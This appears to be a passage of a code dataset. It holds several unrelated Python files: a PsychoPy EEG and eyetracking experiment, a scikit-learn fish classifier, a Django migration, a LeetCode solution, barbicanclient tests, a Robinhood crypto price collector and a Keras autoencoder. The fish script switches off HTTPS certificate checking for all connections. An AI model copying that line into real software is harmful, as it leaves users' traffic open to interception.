trial\n\ndef display_trial(trial, trial_idx,itrial, iblock, win, fix, square,circle,white_track,black_track,question,experiment_info,num_prac=None,tracker=None):\n #Recording Check\n if trial_idx == 1 or num_prac == 1:\n text_screen(text='Experimenter, are you recording?', input_keys='y',bg_color=[0,0,.3],win=win)\n \n #Subject initiates block\n if itrial == 0:\n text_screen(text='Press S to begin block', input_keys = 's', win=win)\n\n trial_code = 101 + itrial\n block_code = 231 + iblock \n\n if question['Eyetracking'] == 'Y':\n if num_prac is None:\n tracker.send_message(str(trial_code)) #send eyetraker trial num\n tracker.send_message(str(block_code)) #send eyetracker block num\n else:\n tracker.send_message('Practice')\n status = 'Trial Type:%s, Block: %d, Trial: %d' % (trial['trial_type'], iblock+1, itrial+1)\n tracker.send_status(status)\n tracker.start_recording() \n\n if question['EEG']=='Y':\n if num_prac is None:\n parallel.setData(1)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '1')\n\n if question['Stim Track'] == 'Y':\n black_track.draw() \n fix.draw()\n win.flip()\n\n #BEGIN ITI# also experimenter input for pause/calibrate/escape\n iti = (random.randrange(600,1000,20))/1000\n resp = []\n resp = event.waitKeys(maxWait=iti, keyList=['escape','o','b','m'])\n if resp == ['escape']:\n win.close()\n if tracker:\n tracker.stop_recording()\n tracker.set_offline_mode()\n tracker.close_edf()\n tracker.transfer_edf()\n tracker.close_connection()\n exit()\n if resp == ['o']:\n if tracker:\n tracker.calibrate()\n fix.draw()\n win.flip()\n core.wait(1.5)\n if resp == ['b']:\n TextStim(win=win,text='Blink',pos = [0,1], color = [1,-1,-1]).draw()\n fix.draw()\n win.flip()\n core.wait(1)\n fix.draw()\n win.flip()\n core.wait(1)\n if resp == ['m']:\n TextStim(win=win,text='Eye Movement',pos = [0,1], color = [1,-1,-1]).draw()\n fix.draw()\n win.flip()\n core.wait(1)\n fix.draw()\n win.flip()\n core.wait(1)\n if question['Stim Track'] == 'Y':\n black_track.draw()\n\n #END ITI\n\n #STIM PRESENTATION#\n fix.draw()\n\n #draw stim\n for istim in range(trial['set_size']):\n square.fillColor = trial['stim_colors'][istim]\n square.pos = trial['locations'][istim]\n square.draw()\n\n #draw grey stim\n for istim in range(5-trial['set_size']):\n circle.pos = trial['locations'][trial['set_size']+istim]\n circle.draw()\n \n if question['Stim Track'] == 'Y':\n white_track.draw()\n\n if question['Eyetracking'] == 'Y':\n tracker.send_message('ArrayOnset')\n\n if question['EEG']=='Y':\n if num_prac is None:\n if trial['set_size'] == 1:\n parallel.setData(11)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'11')\n if trial['set_size'] == 2:\n parallel.setData(12)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'12')\n if trial['set_size'] == 3:\n parallel.setData(13)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'13')\n if trial['set_size'] == 4:\n parallel.setData(14)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync+'14')\n\n #show stim\n win.flip()\n core.wait(.25) #amount of time for stim presentation\n #END STIM PRESENTATION#\n\n #BEGIN DELAY PERIOD#\n fix.draw()\n if question['Stim Track'] == 'Y':\n white_track.draw()\n if question['EEG']=='Y':\n if num_prac is None:\n parallel.setData(21)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '21')\n win.flip()\n core.wait(1)\n\n #END DELAY PERIOD#\n\n #BEGIN PROBE#\n square.fillColor = trial['test_color']\n square.pos = trial['test_location']\n square.draw()\n fix.draw()\n \n if question['Stim Track'] == 'Y':\n black_track.draw()\n \n if question['EEG']=='Y':\n if num_prac is None:\n if trial['trial_type'] == 0:\n parallel.setData(31)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '31')\n else: \n parallel.setData(32)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '32')\n\n win.flip()\n\n #get response\n rt_timer = core.MonotonicClock() #start timer\n\n resp = event.waitKeys(keyList=[same_key,diff_key], timeStamped=rt_timer)\n\n keyresp = resp[0][0] #log response \n\n acc = 1 if keyresp == trial['cresp'] else 0 #record accuracy\n \n if question['EEG']=='Y':\n if num_prac is None:\n if acc == 1:\n parallel.setData(41)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '41')\n else:\n parallel.setData(42)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '42')\n\n rt = resp[0][1]*1000 # key and rt in milliseconds\n\n data = {\n 'Subject': experiment_info['Subject Number'],\n 'Age': experiment_info['Age'],\n 'Sex': experiment_info['Sex'],\n 'Block': iblock + 1,\n 'Trial': itrial + 1,\n 'Timestamp': core.getAbsTime(),\n 'TrialType': trial['trial_type'],\n 'SetSize': trial['set_size'],\n 'RT': rt,\n 'CRESP': trial['cresp'],\n 'RESP': keyresp,\n 'ACC': acc,\n 'LocationTested': trial['test_location'],\n 'Locations': trial['locations'],\n 'SampleColors': trial['stim_colors'],\n 'TestColors': trial['test_color'],\n }\n\n if question['Eyetracking'] == 'Y':\n tracker.stop_recording()\n return data\n\n################\n#Run Experiment#\n################\ndef run_exp(): \n #run experiment dialog boxes\n experiment_info = get_experiment_info_dlg()\n question = experiment_questions()\n \n data_directory = os.getcwd()\n\n change_detection_K = changedetection.Ktask(number_of_trials_per_block=1,\n number_of_blocks=2, experiment_name='KTask_'+experiment_name,\n data_fields=changedetection.data_fields, set_sizes=[6],\n monitor_distance=monitor_distance, data_directory=data_directory)\n\n #change_detection_K.run()\n\n win, fix, square, circle, white_track, black_track = setup_stim()\n\n if question['Eyetracking'] == 'Y':\n tracker = eyelinker.EyeLinker(\n win, 'CDET' + experiment_info['Subject Number'] + '.edf','LEFT')\n\n if question['Eyetracking'] == 'Y':\n #Eyetracking \n tracker.initialize_graphics()\n tracker.open_edf()\n tracker.initialize_tracker()\n tracker.send_calibration_settings()\n\n #open csv to write data to\n file_name = open_csv(experiment_info=experiment_info)\n\n #instructions\n text_screen(text = instruct_text, input_keys='s', win = win)\n\n #initialization\n prac_acc_num = 0\n prac_acc = 0\n num_prac = 0\n prac_cont = ['y']\n trial_idx = 0 #trial number tracker initialization\n total_block_acc = 0\n total_block_acc_num = 0\n\n if question['EEG']=='Y':\n print(parallel.setPortAddress(53328))\n\n #Practice Trials\n if question['Practice'] == 'Y':\n if question['Eyetracking'] == 'Y':\n tracker.calibrate()\n\n while prac_cont == ['y']:\n num_stim, diff_trials, num_gstim = make_block()\n prac_acc_num = 0\n prac_acc = 0\n num_prac = 0\n for itrial in range(12):\n num_prac += 1\n \n trial = make_trial(diff_trials=diff_trials, num_stim=num_stim,num_gstim=num_gstim,itrial=itrial) #make trial info\n \n if question['Eyetracking'] == 'Y':\n data = display_trial(\n trial=trial, trial_idx = trial_idx, itrial=itrial, iblock = 1, win=win, fix=fix,square=square,circle=circle,tracker=tracker,\n white_track=white_track,black_track=black_track,question=question,experiment_info=experiment_info,num_prac=num_prac)\n else:\n data = display_trial(\n trial=trial, trial_idx = trial_idx, itrial=itrial, iblock = 1, win=win, fix=fix,square=square, circle=circle,\n white_track=white_track,black_track=black_track,question=question,experiment_info=experiment_info,num_prac=num_prac)\n prac_acc_num += data['ACC']\n prac_acc = prac_acc_num/num_prac\n print('Trial: {}, TrialType: {}, SetSize: {}, RESP: {}, CRESP: {}, ACC: {}'.format((itrial+1),data['TrialType'],data['SetSize'],data['RESP'],data['CRESP'],data['ACC']))\n \n prac_cont = text_screen(text = \"Accuracy: {}%\\n\\nKeep going?\".format(round(prac_acc,1)*100), input_keys=['n','y'],win=win)\n\n text_screen(text = \"Practice complete!\\n\\nThe experiment will now begin.\\nPress S to continue.\", input_keys='s',win=win)\n\n #run trials for nblocks*ntrials\n for iblock in range(nblocks):\n num_stim, diff_trials, num_gstim = make_block()\n block_acc_num = 0\n block_acc = 0\n\n if question['Eyetracking'] == 'Y':\n tracker.calibrate()\n \n for itrial in range(ntrials):\n trial_idx +=1\n\n ###EXPERIMENT###\n trial = make_trial(diff_trials=diff_trials, num_stim=num_stim, num_gstim=num_gstim,itrial=itrial) #make trial info\n\n if question['Eyetracking'] == 'Y':\n data = display_trial(\n trial=trial,trial_idx=trial_idx, itrial=itrial,iblock=iblock,win=win,fix=fix,square=square,white_track=white_track,\n black_track=black_track,question=question,experiment_info=experiment_info ,tracker=tracker, circle=circle)\n else:\n data = display_trial(\n trial=trial,trial_idx=trial_idx,itrial=itrial,iblock=iblock,win=win,fix=fix,square=square,white_track=white_track,\n black_track=black_track,question=question,experiment_info=experiment_info,circle=circle) \n\n write_to_csv(data = data, file_name=file_name) #write individual trial info to csv\n\n print('Block: {}, Trial: {}, TrialType: {}, SetSize: {}, ACC: {}, CRESP: {}, RESP: {}'.format(data['Block'],data['Trial'],data['TrialType'],data['SetSize'],data['ACC'],data['CRESP'],data['RESP']))\n\n #vars for displaying current block acc\n block_acc_num += data['ACC']\n block_acc = block_acc_num/ntrials\n\n total_block_acc_num += block_acc\n total_block_acc = total_block_acc_num/(iblock+1)\n\n text_screen(\n text=\"You've completed block {}/{}\\n\\nBlock Accuracy: {}%\\nTotal Accuracy: {}%\\n\\nPress S when you are ready to continue.\".format(iblock+1,nblocks,int(block_acc*100),int(total_block_acc*100)),\n input_keys=\"s\",bg_color=[0,0,.3],win=win)\n\n if iblock+1 == nblocks: #end experiment\n if question['EEG'] == 'Y':\n parallel.setData(4)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '4')\n if question['Eyetracking'] == 'Y':\n tracker.set_offline_mode()\n tracker.close_edf()\n tracker.transfer_edf()\n tracker.close_connection()\n text_screen(text= \"The study is complete!\\n\\nPlease contact your experimenter.\", input_keys= 'escape',win=win)\n win.close()\n\nrun_exp()","repo_name":"WilliamThyer/Thyer-et-al-2021-experiment","sub_path":"experiment/1801/wst1801.py","file_name":"wst1801.py","file_ext":"py","file_size_in_byte":21808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"16453473126","text":"import ssl\nimport pandas as pd\nssl._create_default_https_context = ssl._create_unverified_context\nfish = pd.read_csv('https://bit.ly/fish_csv_data')\n# print(fish.head())\n# print(pd.unique(fish['Species']))\nfish_input = fish[['Weight', 'Length', 'Diagonal', 'Height', 'Width']].to_numpy()\nfish_target = fish['Species'].to_numpy()\n# print(fish_input[:5])\n\nfrom sklearn.model_selection import train_test_split\ntrain_input, test_input, train_target, test_target = train_test_split(fish_input,\n fish_target, random_state=42)\n\nfrom sklearn.preprocessing import StandardScaler\nss = StandardScaler()\nss.fit(train_input)\ntrain_scaled = ss.transform(train_input)\ntest_scaled = ss.transform(test_input)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nkn = KNeighborsClassifier(n_neighbors=3)\nkn.fit(train_scaled, train_target)\n# print(kn.score(train_scaled, train_target))\n# print(kn.score(test_scaled, test_target))\n# print(kn.classes_)\n\nimport numpy as np\nproba = kn.predict_proba(test_scaled[:5])\n# print(np.round(proba, decimals=4))\n\ndistances, indexes = kn.kneighbors(test_scaled[3:4])\nprint(train_target[indexes])\n","repo_name":"DonggeunJung/PythonSamples","sub_path":"ml/Fish1.py","file_name":"Fish1.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20687441666","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('contrib', '0023_cria_papeis_padrao'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='servidor',\r\n name='uso_interno',\r\n field=models.BooleanField(default=False, help_text='Define que este servidor \\xe9 de uso interno do sistema'),\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"contrib/migrations/0024_add_uso_interno_em_servidor.py","file_name":"0024_add_uso_interno_em_servidor.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70300160571","text":"\"\"\"\nQUESTION-\n\nGiven the head of a linked list, rotate the list to the right by k places.\nEg:-\nInput: head = [1,2,3,4,5], k = 2\nOutput: [4,5,1,2,3] \n\"\"\"\n\"\"\"\nANSWER-\n\"\"\"\nclass Solution(object):\n def rotateRight(self, head, k): \n if not head:\n return head\n\n length = 1\n tail = head\n \n while tail.next:\n tail = tail.next\n length += 1\n \n k %= length\n \n if k == 0:\n return head\n \n\n steps_to_new_head = length - k\n tail.next = head\n \n while steps_to_new_head > 0:\n tail = tail.next\n steps_to_new_head -= 1\n\n new_head = tail.next\n tail.next = None\n \n return new_head\n\"\"\"\nSOURCE-LEETCODE\n\"\"\"","repo_name":"SreeramVipparla/DSA_Competitive_Coding","sub_path":"Programming_in_Python/02)Strings/Rotate_List.py","file_name":"Rotate_List.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"75143638971","text":"from barbicanclient import client\nfrom barbicanclient.tests import test_client\nfrom barbicanclient.tests.utils import mock_delete_secret_for_responses\nfrom barbicanclient.tests.utils import mock_get_secret_for_client\nfrom barbicanclient.tests.v1.test_secrets import SecretData\nfrom barbicanclient.v1 import secrets\n\nfrom oslo_serialization import jsonutils\n\n\nclass WhenTestingConsumers(test_client.BaseEntityResource):\n\n def setUp(self):\n self._setUp('secrets')\n\n self.secret = SecretData()\n\n self.client_v1_0 = client.Client(\n endpoint=self.endpoint, project_id=self.project_id,\n microversion='1.0')\n\n self.manager = self.client.secrets\n self.manager_v1_0 = self.client_v1_0.secrets\n\n self.consumers_post_resource = self.entity_href + '/consumers/'\n self.consumers_delete_resource = self.entity_href + '/consumers'\n\n def test_register_consumer_fails_with_lower_microversion(self):\n self.assertRaises(\n NotImplementedError, self.manager_v1_0.register_consumer,\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def _register_consumer(self):\n data = self.secret.get_dict(\n self.entity_href, consumers=[self.secret.consumer])\n self.responses.post(self.entity_href + '/consumers/', json=data)\n return self.manager.register_consumer(\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def test_should_register_consumer_with_correct_microversion(self):\n self._register_consumer()\n\n def test_should_register_consumer_and_return_secret(self):\n self.assertIsInstance(self._register_consumer(), secrets.Secret)\n\n def test_should_register_consumer_with_correct_secret_href(self):\n secret = self._register_consumer()\n self.assertEqual(self.entity_href, secret.secret_ref)\n\n def test_should_register_consumer_with_correct_url(self):\n self._register_consumer()\n self.assertEqual(\n self.consumers_post_resource, self.responses.last_request.url)\n\n def test_should_register_consumer_with_consumer(self):\n secret = self._register_consumer()\n self.assertEqual([self.secret.consumer], secret.consumers)\n\n def test_remove_consumer_fails_with_lower_microversion(self):\n self.assertRaises(\n NotImplementedError, self.manager_v1_0.remove_consumer,\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def _remove_consumer(self):\n self.responses.delete(self.entity_href + '/consumers', status_code=204)\n self.manager.remove_consumer(\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def test_should_remove_consumer_with_correct_microversion(self):\n self._remove_consumer()\n\n def test_should_remove_consumer_with_correct_url(self):\n self._remove_consumer()\n self.assertEqual(\n self.consumers_delete_resource, self.responses.last_request.url)\n\n def test_should_remove_consumer_with_correct_consumer(self):\n self._remove_consumer()\n self.assertEqual(\n self.consumers_delete_resource, self.responses.last_request.url)\n\n body = jsonutils.loads(self.responses.last_request.text)\n self.assertEqual(self.secret.consumer, body)\n\n def _delete_from_manager(self, secret_ref, force=False, consumers=[]):\n mock_get_secret_for_client(self.client, consumers=consumers)\n mock_delete_secret_for_responses(self.responses, self.entity_href)\n self.manager.delete(secret_ref=secret_ref, force=force)\n\n def _delete_from_manager_with_consumers(self, secret_ref, force=False):\n consumers = [{'service': 'service_test',\n 'resource_type': 'type_test',\n 'resource_id': 'id_test'}]\n\n self._delete_from_manager(secret_ref, force=force, consumers=consumers)\n\n def test_delete_from_manager_fails_with_consumers_without_force(self):\n self.assertRaises(\n ValueError,\n self._delete_from_manager_with_consumers, self.entity_href,\n force=False)\n\n def test_should_delete_from_manager_with_consumers_and_force(self):\n self._delete_from_manager_with_consumers(self.entity_href, force=True)\n\n def test_should_delete_from_manager_without_consumers_and_force(self):\n self._delete_from_manager(self.entity_href, force=True)\n\n def _list_consumers(self, secret_ref, consumers=[]):\n mock_get_secret_for_client(self.client, consumers)\n return self.manager.list_consumers(secret_ref)\n\n def test_list_consumers_from_secret_without_consumers(self):\n consumer_list = self._list_consumers(self.entity_href)\n self.assertTrue(len(consumer_list) == 0)\n\n def test_list_consumers_from_secret_with_consumers(self):\n consumers = [{'service': 'service_test1',\n 'resource_type': 'type_test1',\n 'resource_id': 'id_test1'},\n {'service': 'service_test2',\n 'resource_type': 'type_test2',\n 'resource_id': 'id_test2'}]\n consumer_list = self._list_consumers(self.entity_href, consumers)\n\n for elem in range(len(consumers)):\n self.assertTrue(\n consumer_list[elem].service ==\n consumers[elem]['service'])\n self.assertTrue(\n consumer_list[elem].resource_type ==\n consumers[elem]['resource_type'])\n self.assertTrue(\n consumer_list[elem].resource_id ==\n consumers[elem]['resource_id'])\n\n def test_should_fail_list_consumers_invalid_secret(self):\n self.assertRaises(ValueError, self.manager.list_consumers,\n **{'secret_ref': '12345'})\n","repo_name":"openstack/python-barbicanclient","sub_path":"barbicanclient/tests/v1/test_consumers.py","file_name":"test_consumers.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"78"} +{"seq_id":"25988463272","text":"\"\"\"Script to gather market data from OKCoin Spot Price API.\"\"\"\nimport requests\nimport datetime\nimport time\nfrom pytz import utc\nfrom datetime import datetime\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom algo_trading.mongo_connect import rh_crypto_collection\n\nfrom algo_trading.exchange.exchange_context import ExchangeContext\nfrom algo_trading.exchange.robinhood_actions import RobinhoodActions\n\ncollection = rh_crypto_collection()\n\ndef tick(symbol, exchange_actions):\n aggregate_quote = grab_latest_aggregate_quote(symbol, exchange_actions)\n collection.insert_one(aggregate_quote)\n print(aggregate_quote)\n\ndef grab_latest_aggregate_quote(symbol, exchange_actions):\n quotes = []\n for _ in range(60):\n quotes.append(exchange_actions.get_crypto_quote(symbol))\n time.sleep(1)\n \n seq = [quote['bid_price'] for quote in quotes]\n return {\n \"high\": max(seq),\n \"low\": min(seq),\n \"date\": datetime.utcnow().isoformat(),\n \"close\": quotes[-1]['bid_price'],\n \"symbol\": symbol\n }\n\ndef main():\n \"\"\"Run tick() at the interval of every ten seconds.\"\"\"\n scheduler = BlockingScheduler(timezone=utc, job_defaults={'max_instances': 2})\n scheduler.add_job(tick, 'interval', ['BTC', ExchangeContext(RobinhoodActions())], seconds=60)\n try:\n scheduler.start()\n except (KeyboardInterrupt, SystemExit):\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"joshfermin/algo-trading","sub_path":"algo_trading/data_collection/rh_crypto_data.py","file_name":"rh_crypto_data.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5981900308","text":"#!/usr/bin/env python\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Conv2D, ReLU, BatchNormalization, Flatten, Dense, Reshape, Conv2DTranspose, Activation\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import MeanSquaredError, Huber\n\nimport pickle\nimport numpy as np\nimport argparse\n\nimport sys\nimport os\n# Add this directory to path so that package is recognized.\n# Looks like a hack, but is ok for now to allow moving forward\n# Source: https://stackoverflow.com/a/23891673/4973224\n# TODO: Replace with the idiomatic way.\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\nfrom Audex.utils.utils_common import *\nfrom Audex.utils.utils_audex import *\n\ndef process_clargs():\n parser = argparse.ArgumentParser(description = 'This script launches an ASR client.')\n \n parser.add_argument(\"-sample_arch\", action ='store_true', help='Show an example model architecture summary.')\n \n args = parser.parse_args()\n return args\n\nclass Autoencoder:\n FILENAME_WEIGHTS = \"weights.h5\"\n FILENAME_HYPARAMS = \"hyparams.pkl\"\n \"\"\"\n Autoencoder represents a Deep Convolutional autoencoder architecture\n with mirrored encoder and decoder components.\n \"\"\"\n def __init__(self, input_shape, conv_filters, conv_kernels, conv_strides, dim_latent):\n self.input_shape = input_shape # (28, 28, 1)\n self.conv_filters = conv_filters # (2, 4, 8)-tuple\n self.conv_kernels = conv_kernels # (3, 5, 3)-tuple\n self.conv_strides = conv_strides # (1, 2, 2)-tuple\n self.dim_latent = dim_latent # 2\n\n self.model_enc = None\n self.model_dec = None\n self.model_ae = None\n\n self._num_conv_layers = len(conv_filters)\n self._shape_before_bottleneck = None\n self._model_input = None\n\n self._build()\n\n def summary(self):\n self.model_enc.summary()\n self.model_dec.summary()\n self.model_ae.summary()\n\n def compile(self, learning_rate=0.0001):\n opt = Adam(learning_rate=learning_rate)\n mse = MeanSquaredError()\n hub = Huber()\n self.model_ae.compile(optimizer=opt, loss=mse)\n\n def train(self, inputs, targets, batch_size, epochs, callbacks):\n # Example inputs.shape == (1660, 44, 16, 1)\n # Passing inputs as targets data is essentially the trick to make this NN generative\n # For NC, pass noisy audio as input data and clean audio as target data\n\n # x = np.full_like(inputs, 0.3) # experimentation with a fixed target\n \n # Fixed audio signum target\n #x = inputs[40]\n #x = np.repeat(x[np.newaxis, :, :, :], inputs.shape[0], axis=0) # repeated array\n\n print_info(\"Training AE on data of shapes:\")\n print_info(\"Inputs: \", inputs.shape)\n print_info(\"Targets:\", targets.shape)\n history = self.model_ae.fit(inputs, targets, batch_size=batch_size, epochs=epochs, shuffle=True, callbacks=callbacks)\n return history\n\n def save_model(self, trainid):\n MODEL_FULLPATH = os.path.join(Aimx.Paths.GEN_SAVED_MODELS, \"model_\" + trainid)\n MODEL_PARAMS_FULLPATH = os.path.join(MODEL_FULLPATH, self.FILENAME_HYPARAMS)\n MODEL_ASSETS_FULLPATH = os.path.join(MODEL_FULLPATH, \"assets\")\n Path(MODEL_FULLPATH).mkdir(parents=True, exist_ok=True)\n params = [\n self.input_shape,\n self.conv_filters,\n self.conv_kernels,\n self.conv_strides,\n self.dim_latent\n ]\n # Save parameters\n print_info(\"|||||| Saving model\", quote_path(MODEL_FULLPATH), \"... \", end=\"\")\n with open(MODEL_PARAMS_FULLPATH, \"wb\") as f:\n pickle.dump(params, f)\n \n # Save weights\n self.model_ae.save_weights(os.path.join(MODEL_FULLPATH, self.FILENAME_WEIGHTS))\n print_info(\"[DONE]\")\n\n # Save model quicksetup\n MODEL_QUICKSETUP_FULLPATH = os.path.join(WORKDIR, trainid + (\".bat\" if windows() else \".sh\"))\n with open(MODEL_QUICKSETUP_FULLPATH, \"w\") as f:\n print_info(\"|||||| Writing file\", quote_path(MODEL_QUICKSETUP_FULLPATH), \"... \", end=\"\")\n MODEL_METAS_FULLPATH = os.path.join(MODEL_ASSETS_FULLPATH, \"*.json\")\n if windows():\n content = \"xcopy \" + dquote(MODEL_METAS_FULLPATH) + \"^\\n\\t \" + dquote(WORKDIR) + \"^\\n\\t\" + \"/K /H /Y\"\n else: # Linux\n content = \"cp \" + MODEL_METAS_FULLPATH + \" \\\\\\n \" + WORKDIR\n f.write(content)\n print_info(\"[DONE]\")\n \n # Save assets\n Path(MODEL_ASSETS_FULLPATH).mkdir(parents=True, exist_ok=True) # create model assets directory (similar to TF2.x default's)\n print_info(\"|||||| Copying file\", quote_path(Aimx.Dataprep.RESULT_METADATA_FULLPATH), \"into model assets... \", end=\"\")\n copy2(Aimx.Dataprep.RESULT_METADATA_FULLPATH, MODEL_ASSETS_FULLPATH)\n print_info(\"[DONE]\")\n print_info(\"|||||| Copying file\", quote_path(Aimx.Training.RESULT_METADATA_FULLPATH), \"into model assets... \", end=\"\")\n copy2(Aimx.Training.RESULT_METADATA_FULLPATH, MODEL_ASSETS_FULLPATH)\n print_info(\"[DONE]\")\n print_info(\"|||||| Copying file\", quote_path(MODEL_QUICKSETUP_FULLPATH), \"into model assets... \", end=\"\")\n copy2(MODEL_QUICKSETUP_FULLPATH, MODEL_ASSETS_FULLPATH)\n print_info(\"[DONE]\")\n\n def load_weights(self, weights_path):\n self.model_ae.load_weights(weights_path)\n\n def regen(self, images):\n vencs = self.model_enc.predict(images) # encode into latent space\n genums = self.model_dec.predict(vencs) # decode from latent space into genum\n return vencs, genums\n\n def gen_random(self, n):\n vencs = np.random.rand(n, self.dim_latent) # n 1d arrays of size dim_latent\n genums = self.model_dec.predict(vencs)\n return vencs, genums\n\n @classmethod\n def load_model(cls, model_path):\n PARAMS_FULLPATH = os.path.join(model_path, cls.FILENAME_HYPARAMS)\n WEIGHTS_FULLPATH = os.path.join(model_path, cls.FILENAME_WEIGHTS)\n try:\n print_info(\"|||||| Loading model \" + quote_path(model_path) + \"... \", end=\"\")\n with open(PARAMS_FULLPATH, \"rb\") as p:\n params = pickle.load(p)\n ae = Autoencoder(*params)\n ae.load_weights(WEIGHTS_FULLPATH)\n print_info(\"[DONE (model loaded)]\", quote_path(model_path))\n except Exception as e:\n print(pinkred(\"\\nException caught while trying to load the model: \" + quote_path(model_path)))\n print(pinkred(\"Exception message: \") + red(str(e)))\n return ae\n\n def _build(self):\n self._build_encoder()\n self._build_decoder()\n self._build_autoencoder()\n\n def _build_encoder(self):\n encoder_input = self._add_encoder_input()\n conv_layers = self._add_conv_layers(encoder_input)\n bottleneck = self._add_bottleneck(conv_layers)\n self._model_input = encoder_input\n self.model_enc = tf.keras.Model(encoder_input, bottleneck, name=\"ENCODER\")\n\n def _build_decoder(self):\n decoder_input = self._add_decoder_input()\n dense_layer = self._add_dense_layer(decoder_input)\n reshape_layer = self._add_reshape_layer(dense_layer)\n conv_transpose_layers = self._add_conv_transpose_layers(reshape_layer)\n decoder_output = self._add_decoder_output(conv_transpose_layers)\n self.model_dec = tf.keras.Model(decoder_input, decoder_output, name=\"DECODER\")\n\n def _build_autoencoder(self):\n model_input = self._model_input\n model_output = self.model_dec(self.model_enc(model_input))\n self.model_ae = tf.keras.Model(model_input, model_output, name=\"AUTOENCODER\")\n\n def _add_encoder_input(self):\n return tf.keras.layers.Input(shape=self.input_shape, name=\"encoder_input\")\n\n def _add_conv_layers(self, encoder_input):\n \"\"\" Create all convolutional blocks in encoder. \"\"\"\n x = encoder_input\n for layer_index in range(self._num_conv_layers):\n x = self._add_conv_layer(layer_index, x)\n return x\n\n def _add_conv_layer(self, layer_index, x):\n \"\"\" Add a convolutional block to a graph of layers, consisting of conv 2d + ReLU + batch normalization. \"\"\"\n layer_number = layer_index + 1\n conv_layer = tf.keras.layers.Conv2D(\n filters = self.conv_filters[layer_index],\n kernel_size = self.conv_kernels[layer_index],\n strides = self.conv_strides[layer_index],\n padding = \"same\",\n name = f\"encoder_conv_layer_{layer_number}\"\n )\n x = conv_layer(x)\n x = tf.keras.layers.ReLU( name = f\"encoder_relu_{layer_number}\")(x)\n x = tf.keras.layers.BatchNormalization(name = f\"encoder_bn_{layer_number}\")(x)\n return x\n\n def _add_bottleneck(self, x):\n \"\"\" Flatten data and add bottleneck (Dense layer). \"\"\"\n # Save the shape just before flattening\n # to be able to restore it later in the decoder\n self._shape_before_bottleneck = tf.keras.backend.int_shape(x)[1:] # first dimension is batch size, ignore it and take only width, height and number of channels\n \n x = tf.keras.layers.Flatten()(x)\n #n = np.prod(self._shape_before_bottleneck)\n #x = tf.keras.layers.Dense(n/2)(x)\n #x = tf.keras.layers.Dense(n/4)(x)\n #x = tf.keras.layers.Dense(n/8)(x)\n x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output2\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output3\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output4\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output5\")(x)\n return x\n\n def _add_decoder_input(self):\n return tf.keras.layers.Input(shape=self.dim_latent, name=\"decoder_input\")\n\n def _add_dense_layer(self, decoder_input):\n # Here we want the same number of neurons as there are in the layer before the bottleneck,\n # but flattened. So for a shape of (1, 2, 4) we need 8 (which is the product of dimensions).\n num_neurons = np.prod(self._shape_before_bottleneck)\n #n = np.prod(self._shape_before_bottleneck)\n #dense_layer = tf.keras.layers.Dense(n/8)(decoder_input)\n #dense_layer = tf.keras.layers.Dense(n/4)(dense_layer)\n #dense_layer = tf.keras.layers.Dense(n/2)(dense_layer)\n #dense_layer = tf.keras.layers.Dense(num_neurons, name=\"decoder_dense\")(dense_layer)\n dense_layer = tf.keras.layers.Dense(num_neurons, name=\"decoder_dense\")(decoder_input)\n return dense_layer\n\n def _add_reshape_layer(self, dense_layer):\n return tf.keras.layers.Reshape(self._shape_before_bottleneck)(dense_layer)\n\n def _add_conv_transpose_layers(self, x):\n \"\"\" Add conv transpose blocks. \"\"\"\n # loop through all the conv layers in reverse order and stop at the first layer\n for layer_index in reversed(range(1, self._num_conv_layers)):\n x = self._add_conv_transpose_layer(layer_index, x)\n return x\n\n def _add_conv_transpose_layer(self, layer_index, x):\n layer_num = self._num_conv_layers - layer_index\n conv_transpose_layer = 